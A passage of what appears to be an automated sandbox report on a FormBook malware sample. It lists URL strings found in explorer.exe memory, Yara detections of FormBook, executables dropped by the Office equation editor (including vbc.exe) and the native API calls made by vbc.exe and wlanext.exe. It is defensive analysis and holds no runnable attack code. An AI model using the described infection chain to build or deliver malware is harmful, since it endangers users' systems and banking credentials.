          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2218367895.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000008.00000000.2216707466.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2216995609.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000008.00000000.2218367895.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2216707466.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2216497728.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000008.00000000.2225535708.000000000861C000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2216707466.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004181D0 NtCreateFile,7_2_004181D0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00418280 NtReadFile,7_2_00418280
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00418300 NtClose,7_2_00418300
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004183B0 NtAllocateVirtualMemory,7_2_004183B0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004181CB NtCreateFile,7_2_004181CB
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041827B NtReadFile,7_2_0041827B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00418222 NtReadFile,7_2_00418222
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004183AA NtAllocateVirtualMemory,7_2_004183AA
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041842A NtAllocateVirtualMemory,7_2_0041842A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009200C4 NtCreateFile,LdrInitializeThunk,7_2_009200C4
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00920048 NtProtectVirtualMemory,LdrInitializeThunk,7_2_00920048
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00920078 NtResumeThread,LdrInitializeThunk,7_2_00920078
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009207AC NtCreateMutant,LdrInitializeThunk,7_2_009207AC
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091F9F0 NtClose,LdrInitializeThunk,7_2_0091F9F0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091F900 NtReadFile,LdrInitializeThunk,7_2_0091F900
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_0091FAD0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_0091FAE8
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_0091FBB8
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_0091FB68
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FC90 NtUnmapViewOfSection,LdrInitializeThunk,7_2_0091FC90
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FC60 NtMapViewOfSection,LdrInitializeThunk,7_2_0091FC60
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FD8C NtDelayExecution,LdrInitializeThunk,7_2_0091FD8C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_0091FDC0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FEA0 NtReadVirtualMemory,LdrInitializeThunk,7_2_0091FEA0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_0091FED0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FFB4 NtCreateSection,LdrInitializeThunk,7_2_0091FFB4
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009210D0 NtOpenProcessToken,7_2_009210D0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00920060 NtQuerySection,7_2_00920060
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009201D4 NtSetValueKey,7_2_009201D4
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0092010C NtOpenDirectoryObject,7_2_0092010C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00921148 NtOpenThread,7_2_00921148
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091F8CC NtWaitForSingleObject,7_2_0091F8CC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020200C4 NtCreateFile,LdrInitializeThunk,9_2_020200C4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020207AC NtCreateMutant,LdrInitializeThunk,9_2_020207AC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FAB8 NtQueryValueKey,LdrInitializeThunk,9_2_0201FAB8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_0201FAD0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FAE8 NtQueryInformationProcess,LdrInitializeThunk,9_2_0201FAE8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FB50 NtCreateKey,LdrInitializeThunk,9_2_0201FB50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FB68 NtFreeVirtualMemory,LdrInitializeThunk,9_2_0201FB68
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FBB8 NtQueryInformationToken,LdrInitializeThunk,9_2_0201FBB8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201F900 NtReadFile,LdrInitializeThunk,9_2_0201F900
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201F9F0 NtClose,LdrInitializeThunk,9_2_0201F9F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_0201FED0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FFB4 NtCreateSection,LdrInitializeThunk,9_2_0201FFB4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FC60 NtMapViewOfSection,LdrInitializeThunk,9_2_0201FC60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FD8C NtDelayExecution,LdrInitializeThunk,9_2_0201FD8C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FDC0 NtQuerySystemInformation,LdrInitializeThunk,9_2_0201FDC0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02020048 NtProtectVirtualMemory,9_2_02020048
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02020060 NtQuerySection,9_2_02020060
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02020078 NtResumeThread,9_2_02020078
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020210D0 NtOpenProcessToken,9_2_020210D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0202010C NtOpenDirectoryObject,9_2_0202010C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02021148 NtOpenThread,9_2_02021148
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020201D4 NtSetValueKey,9_2_020201D4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FA20 NtQueryInformationFile,9_2_0201FA20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FA50 NtEnumerateValueKey,9_2_0201FA50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FBE8 NtQueryVirtualMemory,9_2_0201FBE8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201F8CC NtWaitForSingleObject,9_2_0201F8CC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02021930 NtSetContextThread,9_2_02021930
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201F938 NtWriteFile,9_2_0201F938
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FE24 NtWriteVirtualMemory,9_2_0201FE24
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FEA0 NtReadVirtualMemory,9_2_0201FEA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FF34 NtQueueApcThread,9_2_0201FF34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FFFC NtCreateProcessEx,9_2_0201FFFC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FC30 NtOpenProcess,9_2_0201FC30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02020C40 NtGetContextThread,9_2_02020C40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FC48 NtSetInformationFile,9_2_0201FC48
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FC90 NtUnmapViewOfSection,9_2_0201FC90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FD5C NtEnumerateKey,9_2_0201FD5C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02021D80 NtSuspendThread,9_2_02021D80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D81D0 NtCreateFile,9_2_000D81D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D8280 NtReadFile,9_2_000D8280
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D8300 NtClose,9_2_000D8300
